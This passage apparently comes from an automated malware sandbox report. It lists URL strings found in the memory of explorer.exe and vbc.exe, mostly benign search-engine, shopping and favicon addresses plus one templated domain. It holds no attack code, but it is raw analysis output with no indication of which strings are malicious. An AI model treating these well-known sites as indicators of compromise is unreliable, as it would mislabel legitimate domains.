Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000006.00000000.2155249221.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: vbc.exe, 00000004.00000002.2141535584.0000000002160000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2145283595.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2151311549.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2160820434.000000000842E000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
